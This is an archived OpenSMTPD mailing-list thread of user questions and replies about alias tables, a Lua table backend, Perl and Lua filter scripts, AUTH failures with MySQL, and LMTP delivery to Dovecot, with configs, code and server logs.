> I???m trying to match an email: nos...@domain.tld to expand to 
> webmas...@domain.tld and deliver to local mailbox.
> 
> My setup is pretty simple and works well for virtual mailboxes linked to a 
> couple of virtual domains. now I???m trying t add aliases to some accounts.
> 
> From the error, it seems like smtpd is not transforming the alias address 
> into the final address for delivery.
> Seems like I???m not understanding how smtpd transforms an recipient address 
> in an  into the actual recipient for delivery.
> 
> I must be conceptually stumped on this one.
> 
> I get the following error in logs and a return mail from smtpd to sender:
> 
> > 
> > I'm sorry to have to inform you that your message could not
> > be delivered to one or more recipients.
> > 
> > 
> > : host mx.domain.tld[xxx.xxx.xxx.xxx] said: 550 Invalid
> >recipient:  (in reply to RCPT TO command)
> > Reporting-MTA: dns; st43p00im-zteg10071901.me.com
> > X-Postfix-Queue-ID: 4E253D8138E
> > X-Postfix-Sender: rfc822; sen...@domain2.tld
> > Arrival-Date: Sat, 24 Aug 2019 10:24:30 + (UTC)
> > 
> > Final-Recipient: rfc822;nos...@domain.tld
> > Original-Recipient: rfc822;nos...@domain.tld
> > Action: failed
> > Status: 5.0.0
> > Remote-MTA: dns; mx.domain.tld
> > Diagnostic-Code: smtp; 550 Invalid recipient: 
> > 
> > From: 
> > Subject: Fwd: Undelivered Mail Returned to Sender
> > Date: 24 August 2019 at 12:24:27 GMT+2
> > To: nos...@domain.tld
> > 
> 
> 
> 
> the configuration files for the domain and tables follows.
> 
> 
> 
> 
> # file:/etc/mail/domain.tld/accounts/valiases:
> =
> > nospam webmas...@domain.tld
> ## EOF
> 
> # file:/etc/mail/domain.tld/accounts/emails
> 
> > webmas...@domain.tld::/home/domain/mail/master
> > webdus...@domain.tld::/home/domain/mail/duster
> > webbus...@domain.tld::/home/domain/mail/buster

I'm not sure this will work. I'm not sure you can map a virtual user to 
a single system user with multiple `homes'.

maybe try:

webmaster   ::/home/domain/mail/master

and see if that gets you further.

> ## EOF
> 
> # file:/etc/mail/domain.sub.smtpd.conf
> =
> 
> > ## =
> > ## DOMAIN CONFIGURATION:
> > ## =
> > # TABLE DECLARATIONS:
> > # ---
> > table domains   \
> > file:/etc/mail/domain.tld/domains
> > table valiases  \
> > file:/etc/mail/domain.tld/accounts/valiases
> > table e-boxes   \
> > file:/etc/mail/domain.tld/accounts/emails
> > 
> > # ACTIONS
> > # ---
> > action valiases_set \
> > expand-only \ 

Seems like expand-only should work with `virtual' aliases, but I'm not sure.
Maybe remove it and see what happens.

> > virtual 
> > action deliver_virtual_set  \
> > maildir \
> > userbase 
> > 
> > # MATCHES
> > # ---
> > match from any  \
> >   for domain   \
> >   action valiases_set
> > match from any  \
> >   for domain   \
> >   action deliver_virtual_set
> > 
> > 
> 

Hope this helps.

Edgar



Re: table api question

2019-08-24 Thread Edgar Pettijohn
On Sat, Aug 24, 2019 at 08:19:00AM +, gil...@poolp.org wrote:
> 24 ao??t 2019 02:59 "Edgar Pettijohn"  a ??crit:
> 
> > I am writing a table-lua, however the table_lua_update function doesn't 
> > appear to be called.
> > Here are relevant pieces of the code.
> > 
> > The lookup function works. However, it would be more ideal to have the 
> > update() called early
> > to fill in the tables for the other functions. As is the lookup() has to do 
> > the work of both.
> > 
> > Any help is appreciated.
> > 
> 
> update is called when you issue an `smtpctl table update ` command.

Makes sense. However, the smtpctl manual says its for tables using the "file" 
backend.

> 
> On a side note, I had this discussion with someone a few days ago but can't 
> remember
> who, so if it was you and you already know, disregard:
>
> I have a plan for the next two releases to switch the implementation of 
> tables to an
> API similar to that of filters, so we can have tables become scripts that 
> read lines
> from stdin, write answers to stdout, be written in any language, etc..
> 

Not me but sounds interesting.
 
> Not discouraging you from writing something using the current API, it is not 
> so much
> work anyways, but just letting you know that in a relatively short term your 
> code is
> going to need a rewrite.

I was using table-passwd as a bit of a go by. Armed with this new knowledge. I 
see that 
table_passwd_update is called from main.  I think that is what I need to do.

Thanks,

Edgar



table api question

2019-08-23 Thread Edgar Pettijohn
I am writing a table-lua, however the table_lua_update function doesn't appear 
to be called.
Here are relevant pieces of the code.

The lookup function works. However, it would be more ideal to have the update() 
called early
to fill in the tables for the other functions. As is the lookup() has to do the 
work of both.

Any help is appreciated.

Thanks,

Edgar

table_lua.c

static int
table_lua_update(void)
{
int ret;

lua_getglobal(L, "update");

lua_pushnil(L);
if (lua_pcall(L, 1, 1, 0)) {
log_warnx("warn: update: %s", lua_tostring(L, -1));
return -1;
}

ret = lua_toboolean(L, -1);

log_warnx("\t\tlua-update: %d\n", ret);
return ret;
}

int
main(int argc, char **argv)
{
int ch;
char *path;

log_init(1);

while ((ch = getopt(argc, argv, "")) != -1) {
switch (ch) {
default:
fatalx("bad option");
/* NOTREACHED */
}
}
argc -= optind;
argv += optind;

if (argc == 0)
fatalx("missing path");
path = argv[0];

L = luaL_newstate();

make_global_table(L, "service", services);
make_global_table(L, "Lookup", NULL);
make_global_table(L, "Fetch", NULL);
make_global_table(L, "Check", NULL);
make_global_table(L, "Update", NULL);

luaL_openlibs(L);
if (luaL_loadfile(L, path) || lua_pcall(L, 0, 0, 0))
fatalx("%s", lua_tostring(L, -1));

log_debug("debug: starting...");

table_api_on_update(table_lua_update);
table_api_on_check(table_lua_check);
table_api_on_lookup(table_lua_lookup);
table_api_on_fetch(table_lua_fetch);

table_api_dispatch();

log_debug("debug: exiting");

lua_close(L);

return 1;
}

table.lua

function update ()
io.stderr:write("\n\t\ttable-lua is updating\n")

return true
end




Re: filter assistance requested

2019-08-20 Thread Edgar Pettijohn

On Aug 20, 2019 4:29 AM, Gilles Chehade  wrote:
>
> On Mon, Aug 19, 2019 at 01:48:05PM -0500, Edgar Pettijohn wrote:
> > Nothing urgent here. Probably can wait for filter documentation. However, 
> > I've been
> > playing with filters off and on with limited success. It seems like 
> > data-line will 
> > be the most useful to filter on so thats been my focus lately. I have the 
> > following
> > script:
> > 
> > #!/usr/bin/perl
> > 
> > use strict;
> > use warnings;
> > use diagnostics;
> > 
> > open(my $fh, '>', '/tmp/log.txt') or die $!;
> > 
> > # remove line buffering
> > select(STDOUT);
> > $|++;
> > select($fh);
> > $|++;
> > 
> > print STDOUT "register|filter|smtp-in|data-line\n";
> > print STDOUT "register|ready\n";
> > 
> > while ( <> ) {
> > chomp; # get rid of newline
> > 
> > my @report = split /\|/;
> > 
> > next if $report[0] eq 'config';
> > 
> > foreach (@report) {
> > print $fh "$_\|"; # just to see whats there
> > }
> >  print $fh "\n";
> > 
> > my $inbody = 0;
> > my ($sid, $token, $line);
> > $sid = $report[5];
> > $token = $report[6];
> > $line = $report[$#report];
> > if ($report[0] eq 'filter' and $report[3] eq 'smtp-in' and 
> >$report[4] eq 'data-line') {
> > die "invalid filter command" if (scalar @report < 7);
> > if ($line eq '') { print $fh "end of headers\n"; $inbody++; 
> >}
> > if ($line eq '.') { print $fh "end of message\n"; 
> >$inbody--; }
> > print $fh "filter-dataline|$token|$sid|$line\n";
> > print STDOUT "filter-dataline|$token|$sid|$line\n";
> > }
> > }
> > 
> > close $fh;
> > 
> > 0;
> > 
> > It prints the following in /tmp/log.txt after a 
> > $ echo "HI" | mail edgar
> > 
> > filter|0|1566239933.835511|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Received:
> >  from localhost (deathstar.my.domain [local])|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Received: from localhost 
> > (deathstar.my.domain [local])
> > filter|0|1566239933.835523|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> >  by deathstar.my.domain (OpenSMTPD) with ESMTPA id 7052ea5a|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  by 
> > deathstar.my.domain (OpenSMTPD) with ESMTPA id 7052ea5a
> > filter|0|1566239933.835529|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> >  for ;|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  for 
> > ;
> > filter|0|1566239933.835533|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> >  Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  Mon, 19 Aug 2019 
> > 13:38:53 -0500 (CDT)
> > filter|0|1566239933.836673|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|From:
> >  Edgar Pettijohn |
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|From: Edgar Pettijohn 
> > 
> > filter|0|1566239933.836681|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Date:
> >  Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Date: Mon, 19 Aug 2019 
> > 13:38:53 -0500 (CDT)
> > filter|0|1566239933.836685|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|To:
> >  edgar|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|To: edgar
> > filter|0|1566239933.836688|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|ef8747a12860387a
> > filter|0|1566239933.836692|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|HI|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|HI
> > filter|0|1566239933.836695|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|.|
> > end of message
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|.
> > 
> > I get the following response:
> > deathstar$ sendmail: command failed: 550 5.7.1 Delivery not authorized, 
> > message refused: Message is not RFC 2822 compliant
> > 
> > I see the same from a telnet session as well.
> > 
> > So there are 2 problems. First my script doesn't appear to acurately 
> > determine that the headers are finished. Second mail
> > doesn't go through. Any suggestions are appreciated.
&g

filter assistance requested

2019-08-19 Thread Edgar Pettijohn
Nothing urgent here. Probably can wait for filter documentation. However, I've 
been
playing with filters off and on with limited success. It seems like data-line 
will 
be the most useful to filter on so thats been my focus lately. I have the 
following
script:

#!/usr/bin/perl

use strict;
use warnings;
use diagnostics;

open(my $fh, '>', '/tmp/log.txt') or die $!;

# remove line buffering
select(STDOUT);
$|++;
select($fh);
$|++;

print STDOUT "register|filter|smtp-in|data-line\n";
print STDOUT "register|ready\n";

while ( <> ) {
chomp; # get rid of newline

my @report = split /\|/;

next if $report[0] eq 'config';

foreach (@report) {
print $fh "$_\|"; # just to see whats there
}
print $fh "\n";

my $inbody = 0;
my ($sid, $token, $line);
$sid = $report[5];
$token = $report[6];
$line = $report[$#report];
if ($report[0] eq 'filter' and $report[3] eq 'smtp-in' and $report[4] 
eq 'data-line') {
die "invalid filter command" if (scalar @report < 7);
if ($line eq '') { print $fh "end of headers\n"; $inbody++; }
if ($line eq '.') { print $fh "end of message\n"; $inbody--; }
print $fh "filter-dataline|$token|$sid|$line\n";
print STDOUT "filter-dataline|$token|$sid|$line\n";
}
}

close $fh;

0;

It prints the following in /tmp/log.txt after a 
$ echo "HI" | mail edgar

filter|0|1566239933.835511|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Received:
 from localhost (deathstar.my.domain [local])|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Received: from localhost 
(deathstar.my.domain [local])
filter|0|1566239933.835523|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a| 
by deathstar.my.domain (OpenSMTPD) with ESMTPA id 7052ea5a|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  by deathstar.my.domain 
(OpenSMTPD) with ESMTPA id 7052ea5a
filter|0|1566239933.835529|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a| 
for ;|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  for 
;
filter|0|1566239933.835533|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a| 
Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  Mon, 19 Aug 2019 
13:38:53 -0500 (CDT)
filter|0|1566239933.836673|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|From:
 Edgar Pettijohn |
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|From: Edgar Pettijohn 

filter|0|1566239933.836681|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Date:
 Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Date: Mon, 19 Aug 2019 
13:38:53 -0500 (CDT)
filter|0|1566239933.836685|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|To:
 edgar|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|To: edgar
filter|0|1566239933.836688|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|ef8747a12860387a
filter|0|1566239933.836692|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|HI|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|HI
filter|0|1566239933.836695|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|.|
end of message
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|.

I get the following response:
deathstar$ sendmail: command failed: 550 5.7.1 Delivery not authorized, message 
refused: Message is not RFC 2822 compliant

I see the same from a telnet session as well.

So there are 2 problems. First my script doesn't appear to acurately determine 
that the headers are finished. Second mail
doesn't go through. Any suggestions are appreciated.

Thanks,

Edgar



Re: AUTH failures requires restarting smtpd

2019-08-10 Thread Edgar Pettijohn

On Aug 10, 2019 1:05 PM, Gilles Chehade  wrote:
>
> On Mon, Jul 22, 2019 at 11:52:45AM -0500, Edgar Pettijohn wrote:
> > 
> > On Jul 22, 2019 8:17 AM, Andreas Karlsson  wrote:
> > >
> > > On 2019-07-21 18:25, Edgar Pettijohn wrote:
> > > > Not sure exactly when this started, but I get authentication errors 
> > > > that require smtpd to be restarted. Here are some logs and other 
> > > > pertinent data.
> > > > 
> > > > Thanks,
> > > > 
> > > > Edgar
> > > > 
> > > Hi,
> > > Can you check if there are any issues with the connection to the MySQL 
> > > database during the time of the credentials lookup fails?
> > >
> > > I've had similar issues with Postgresql databases in the past (many 
> > > OpenSMTPD versions ago) where the psql tcp connection was disconnected 
> > > due to restarting the psql database. This was not handled well by 
> > > OpenSMTPD.
> > >
> > > br,
> > >
> > > -- 
> > > You received this mail because you are subscribed to misc@opensmtpd.org
> > > To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> > >
> > 
> > Maybe something similar. Mysqld is running and double checking the SQL from 
> > the command line works. Plus dovecot is using the same without error.
> > 
> > Thanks,
> > 
>
> Once I tag OpenSMTPD 6.6.0 in August, I'll have a look at extras because
> they've been out of my sight for a while.
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>


Thanks.  As an update I upgraded to a snapshot last week with no change. Have a 
cron job restarting smtpd every hour as a workaround.

Re: AUTH failures requires restarting smtpd

2019-07-22 Thread Edgar Pettijohn

On Jul 22, 2019 8:17 AM, Andreas Karlsson  wrote:
>
> On 2019-07-21 18:25, Edgar Pettijohn wrote:
> > Not sure exactly when this started, but I get authentication errors that 
> > require smtpd to be restarted. Here are some logs and other pertinent data.
> > 
> > Thanks,
> > 
> > Edgar
> > 
> Hi,
> Can you check if there are any issues with the connection to the MySQL 
> database during the time of the credentials lookup fails?
>
> I've had similar issues with Postgresql databases in the past (many 
> OpenSMTPD versions ago) where the psql tcp connection was disconnected 
> due to restarting the psql database. This was not handled well by OpenSMTPD.
>
> br,
>
> -- 
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>

I think it's good. Dovecot still works and I checked from the terminal and it 
worked. 

Thanks,

Edgar

AUTH failures requires restarting smtpd

2019-07-21 Thread Edgar Pettijohn
Not sure exactly when this started, but I get authentication errors that 
require smtpd to be restarted. Here are some logs and other pertinent data.

Thanks,

Edgar
#   $OpenBSD: smtpd.conf,v 1.9 2016/05/03 18:43:45 jung Exp $

# This is the smtpd server system-wide configuration file.
# See smtpd.conf(5) for more information.

pki mail.pettijohn-web.com cert "/etc/ssl/pettijohn-web.com.crt"
pki mail.pettijohn-web.com key "/etc/ssl/private/pettijohn-web.com.key"

table domains mysql:/etc/mail/mysql.conf
table virtuals mysql:/etc/mail/mysql.conf
table credentials mysql:/etc/mail/mysql.conf

filter f01 builtin ehlo fcrdns reject "550 go away punk"
filter f02 builtin helo fcrdns reject "550 go away punk"

filter c01 chain { f01, f02 }

listen on lo0
listen on egress port 25 tls pki mail.pettijohn-web.com filter c01
listen on egress port 587 tls pki mail.pettijohn-web.com auth 

action "act01" lmtp "/var/dovecot/lmtp" rcpt-to virtual 
action "act02" relay

match auth from any for any action act02
match auth from any for domain  action act01
match from any for domain  action act01
Jul 20 19:50:19 mail smtpd[83239]: 624740cbf697f7b7 smtp tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
Jul 20 19:50:20 mail smtpd[83239]: 624740cbf697f7b7 smtp message msgid=c417104e 
size=2221 nrcpt=1 proto=ESMTP
Jul 20 19:50:20 mail smtpd[83239]: 624740cbf697f7b7 smtp envelope 
evpid=c417104e559c49ed from= 
to=
Jul 20 19:50:20 mail dovecot: lmtp(83688): Connect from local
Jul 20 19:50:20 mail dovecot: 
lmtp(ed...@pettijohn-web.com)<83688>: 
msgid=<20190721002023.ga85...@deathstar.my.domain>: saved mail to INBOX
Jul 20 19:50:20 mail dovecot: lmtp(83688): Disconnect from local: Client has 
quit the connection (state=READY)
Jul 20 19:50:20 mail smtpd[83239]: 624740cce7483448 mda delivery 
evpid=c417104e559c49ed from= 
to= rcpt= user=vmail delay=0s 
result=Ok stat=Delivered
Jul 20 19:50:30 mail smtpd[83239]: 624740cbf697f7b7 smtp disconnected 
reason=quit
Jul 20 19:51:59 mail smtpd[83239]: 624740ce5f80c637 smtp connected 
address=185.234.216.144 host=
Jul 20 19:51:59 mail smtpd[83239]: 624740ce5f80c637 smtp failed-command 
command="EHLO User" result="550 go away punk"
Jul 20 19:52:00 mail smtpd[83239]: 624740ce5f80c637 smtp disconnected 
reason=quit
Jul 20 19:56:32 mail smtpd[83239]: 624740cf131a2d57 smtp connected 
address=73.203.197.238 host=c-73-203-197-238.hsd1.tn.comcast.net
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp authentication 
user=ed...@pettijohn-web.com result=ok
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp message msgid=2fd09838 
size=633 nrcpt=1 proto=ESMTP
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp envelope 
evpid=2fd09838a28ee47a from= 
to=
Jul 20 19:56:33 mail smtpd[83239]: 624740d2ef323b04 mta connecting 
address=smtp://104.47.44.33:25 host=104.47.44.33
Jul 20 19:56:33 mail smtpd[83239]: 624740d2ef323b04 mta connected
Jul 20 19:56:33 mail smtpd[83239]: 624740d2ef323b04 mta tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-SHA384:256
Jul 20 19:56:33 mail smtpd[83239]: smtp-out: Server certificate verification 
succeeded on session 624740d2ef323b04
Jul 20 19:56:34 mail smtpd[83239]: 624740d2ef323b04 mta delivery 
evpid=2fd09838a28ee47a from= 
to= rcpt=<-> source="108.61.222.55" relay="104.47.44.33 
(104.47.44.33)" delay=1s result="Ok" stat="250 2.6.0 
 [InternalId=51861730154703, 
Hostname=SN1NAM04HT127.eop-NAM04.prod.protection.outlook.com] 7045 bytes in 
0.126, 54.586 KB/sec Queued mail for delivery -> 250 2.1.5"
Jul 20 19:56:43 mail smtpd[83239]: 624740cf131a2d57 smtp disconnected 
reason=quit
Jul 20 19:56:44 mail smtpd[83239]: 624740d2ef323b04 mta disconnected 
reason=quit messages=1
Jul 20 19:57:36 mail smtpd[83239]: 624740d3d9418c2d smtp connected 
address=73.203.197.238 host=c-73-203-197-238.hsd1.tn.comcast.net
Jul 20 19:57:36 mail smtpd[83239]: 624740d3d9418c2d smtp tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
Jul 20 19:57:37 mail smtpd[83239]: 624740d3d9418c2d smtp authentication 
user=ed...@pettijohn-web.com result=ok
Jul 20 19:57:37 mail smtpd[83239]: 624740d3d9418c2d smtp message msgid=ae4c49da 
size=633 nrcpt=1 proto=ESMTP
Jul 20 19:57:37 mail smtpd[83239]: 624740d3d9418c2d smtp envelope 
evpid=ae4c49da106f2b18 from= 
to=
Jul 20 19:57:37 mail smtpd[83239]: 624740d639a1318b mta connecting 
address=smtp://104.47.2.33:25 host=104.47.2.33
Jul 20 19:57:37 mail smtpd[83239]: 624740d639a1318b mta connected
Jul 20 19:57:38 mail smtpd[83239]: 624740d639a1318b mta tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-SHA384:256
Jul 20 19:57:38 mail smtpd[83239]: smtp-out: Server certificate verification 
succeeded on session 624740d639a1318b
Jul 20 19:57:39 mail smtpd[83239]: 624740d639a1318b mta delivery 
evpid=ae4c49da106f2b18 from= 
to= rcpt=<-> source="108.61.222.55" relay="104.47.2.33 
(104.47.2.33)" delay=2s result="Ok" stat="250 2.6.0 
 [InternalId=52871047466147, 

Re: filter feedback/help request

2019-07-05 Thread Edgar Pettijohn
Turned out to be a line buffering issue. The following works.

#!/usr/bin/perl

open(my $fh, '>', '/tmp/test.txt');

select(STDOUT);
$|++;
select($fh);
$|++;

print STDOUT "register|report|smtp-in|*\n";
print STDOUT "register|ready\n";

while ( my $line = <> ) {
print $fh "$line";
}

close $fh;

0;

-- 
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



Re: what's your LMTP use-case

2019-07-05 Thread Edgar Pettijohn

On Jul 5, 2019 9:57 AM, Gilles Chehade  wrote:
>
> helo,
>
> this is just a question out of curiosity
>
> I know plenty of people use the lmtp action to deliver mail through LMTP
> and I'm genuinely curious: what is your use-case ?
>
> Why do you deliver to LMTP ?
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>
> -- 
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>


I'm using dovecot for imap so might as well let it handle the delivery also. 
Not much of a reason but it's 
it.b��yǢ��m�+)[yƮ�쨹�޲��r��y�h�+kiv��N�r��zǧu���[h�+��칻�&ޢ���kiv��

filter feedback/help request

2019-07-04 Thread Edgar Pettijohn
I've been playing around with filters for a few hours, but I can't seem to get 
perl or lua scripts to work.

Here is a basic shell script that works.

#!/bin/sh

echo "register|report|smtp-in|*" 
echo "register|ready"

while read -r line;
do
echo "$line" >> /tmp/test.txt
done

However, the perl and lua equivalents do nothing. I don't see anything in the 
logs, but not sure if any filtering causes log entries to begin with. I suppose 
I could just use perl in my shell script, but overall it would be better for 
the perl to just work. I don't have much experience with lua, just wanted to 
test something else when I couldn't get perl working. I also tested the 
filter-eventlog and the filters Joerg posted. All of which worked in my very 
basic testing/experimenting. Thanks in advance for any help.

Edgar

#!/usr/bin/perl

open (my $fh, '>', '/tmp/test.txt') or die $!;

print "register|report|smtp-in|*\n";
print "register|ready\n";

while ( <> ) {
print $fh;
}

0;

#!/usr/local/bin/lua53

io.write("register|report|smtp-in|*\n")
io.write("register|ready\n")

out = io.open("/tmp/test.txt", "w")
io.output(out)

while true do
local line = io.read("*line")
if line == nil then break end
io.write(line)
end

-- 
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



Re: LMTP delivery broken in 6.5?

2019-05-23 Thread Edgar Pettijohn

On May 23, 2019 1:38 AM, mabi  wrote:
>
> Hello,
>
> I upgraded my OpenBSD 6.4 MX server running OpenSMTPD 6.4 to OpenBSD 6.5 
> running OpenSMTPD 6.5 but unfortunately had to revert back to 6.4 because 
> mail delivery to Dovecot using LMTP did not work anymore. Is it possible that 
> LMTP mail delivery is broken in OpenSMTPD 6.5?
>
> In my smtpd.conf file I use:
>
> action "lmtp_dovecot" lmtp "/var/dovecot/lmtp" rcpt-to virtual 
>

Make sure dovecot is running and listening at that path. Netcat should help.

> The relevant error log entry of OpenSMTPD is:
>
> May 22 21:49:08 mx1 smtpd[45250]: dfc2d91c04922d88 mda delivery 
> evpid=7f51132de0fd58db from= to= 
> rcpt= user=vmail delay=1s result=PermFail stat=Error 
> ("mail.lmtp: LMTP server error: 451 4.4.0 Remote server not answering 
> (connect)")
>
> In the log file of Dovecot I don't see anything particular but just some 
> information about the connection:
>
> May 22 21:49:07 mx1 dovecot: lmtp(61415): Connect from local
> May 22 21:49:08 mx1 dovecot: lmtp(61415): Disconnect from local: Remote 
> closed connection (state=READY)
>
> I ran a tcpdump on port 24 (Dovecot LMTP port) and could see that the mail 
> delivery never goes past these two first commands:
>

You are delivering to a Unix socket not tcp.

> LHLO mx1.mydomain.tld
> XCLIENT HELO=localhost TTL=5
>
> In fact it seems to be trying in a loop to connect and always run LHLO and 
> XCLIENT but never goes further to actually issuing the mail.
>
> Running "ps auxwww | grep lmtp" shows me that mail.lmtp is running but never 
> manages to deliver the mail successfully:
>
> vmail    19798  0.0  0.1   248  1172 ??  I 10:03PM    0:00.00 
> /usr/libexec/mail.lmtp -f some...@domain.tld -d /var/dovecot/lmtp 
> m...@mydomain.tld
>
> Any ideas what could be going wrong here? or is it possibly a bug in 6.5?
>
> Best regards,
> Mabi
>
>
>

I haven't gotten around to upgrading yet, so I can't confirm if it's broken. 
However, I doubt it since there haven't been any other reports I've seen.

Edgar
>
>
>
>
> --
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>


Re: problem with resolution aliases after upgrade to 6.5

2019-05-05 Thread Edgar Pettijohn
Not sure if it's necessary, but it wouldn't hurt to try restarting smtpd and 
see if it works.
On May 5, 2019 4:59 PM, Sergey Bronnikov  wrote:
>
> Hello!
>
> I've found that smtpd behaves suspiciously with different values with
> the same key in aliases file.
>
> aliases(5) allows to append messages to file, so I added
> ay:    /etc/mail/messages
> to /etc/mail/aliases and update aliases db with newaliases(8).
> Mail sent to address ay@domain has been delivered and appended to
> /etc/mail/messages.
>
> expand: 0x6e46fce1018: expand_insert() called for
> address:a...@bronevichok.ru[parent=0x0, rule=0x0]
> expand: 0x6e46fce1018: inserted node 0x6e3e4edd000
> expand: lka_expand: address: a...@bronevichok.ru [depth=0]
> lookup: match "" as STRING in table static: -> false
> lookup: match "209.85.167.42" as NETADDR in table static: -> false
> lookup: match "209.85.167.42" as NETADDR in table static: -> false
> lookup: match "209.85.167.42" as NETADDR in table static: -> true
> lookup: match "bronevichok.ru" as DOMAIN in table static:domains -> true
> rule #4 matched: match from any for domain domains => local
> expand: 0x6e46fce1018: expand_insert() called for
> username:ay[parent=0x6e3e4edd000, rule=0x6e466726c00, di
> spatcher=0x6e3a063db00]
> expand: 0x6e46fce1018: inserted node 0x6e47f71a800
> expand: lka_expand: username: ay [depth=1, sameuser=0]
> lookup: lookup "ay" as ALIAS in table db:aliases -> "/etc/mail/messages"
> expand: 0x6e483569280: expand_insert() called for
> filename:/etc/mail/messages[parent=0x0, rule=0x0]
> expand: 0x6e483569280: inserted node 0x6e3e4edd800
> expand: 0x6e46fce1018: expand_insert() called for
> filename:/etc/mail/messages[parent=0x6e47f71a800, rule=0x6e466726c00,
> dispatcher=0x6e3a063db00]
> expand: 0x6e46fce1018: inserted node 0x6e3e4edc000
> expand: 0x6e483569280: clearing expand tree
> expand: 0x6e483569280: freeing expand tree
> debug: aliases_get: returned 1 aliases
> expand: lka_expand: filename: /etc/mail/messages [depth=2]
>
>
> Let's replace file by valid email address:
> ay: este...@gmail.com
> and update aliases db with newaliases(8).
> Mail sent to address ay@domain has not been delivered with reason "550
> Invalid recipient: ".
>
> 523e4ad980, dispatcher=0x25248b3c440]
> expand: 0x25251721018: inserted node 0x25251724800
> expand: 0x252bdf33d40: clearing expand tree
>    expand: 0x252bdf33d40: freeing
> expand tree
> debug: aliases_get: returned 1 aliases
> expand: lka_expand: address: este...@gmail.com [depth=2]
> lookup: match "" as STRING in table static: -> false
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static: ->
> false
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static:
> -> true
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static:domains -> false
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static:
> -> true
> no rule matched
> mproc: lka -> pony : 35 IMSG_SMTP_EXPAND_RCPT
> expand: 0x25251721018: clearing expand tree
> imsg: pony <- lka: IMSG_SMTP_EXPAND_RCPT (len=35)
> smtp: 0x1ad082966000: >>> 550 Invalid recipient: 
> mproc: pony -> lka : 62 IMSG_??? (130)
> 54787b61ff698f5f smtp failed-command command="RCPT
> TO:" result="550 Invalid recipient:
> "
>
> Could anyone explain why it happen?
>
> Sergey
>
> пн, 29 апр. 2019 г. в 23:15, Sergey Bronnikov :
> >
> > > Not sure if this is the only problem but domains is a table in this
> > > version so the line should be (missing <>):
> >
> > Good point, fixed it. But looks like there is more than one error in my 
> > config.
> > Still getting error "no such recipient".
> >
> > Sergey
> >
> > пн, 29 апр. 2019 г. в 11:47, John Cox :
> > >
> > > Hi
> > >
> > > >Hello,
> > > >
> > > >I use aliases in an smtpd config and before upgrade to 6.5 it worked 
> > > >fine.
> > > >After upgrade and rewriting config smtpd starts to reject mails
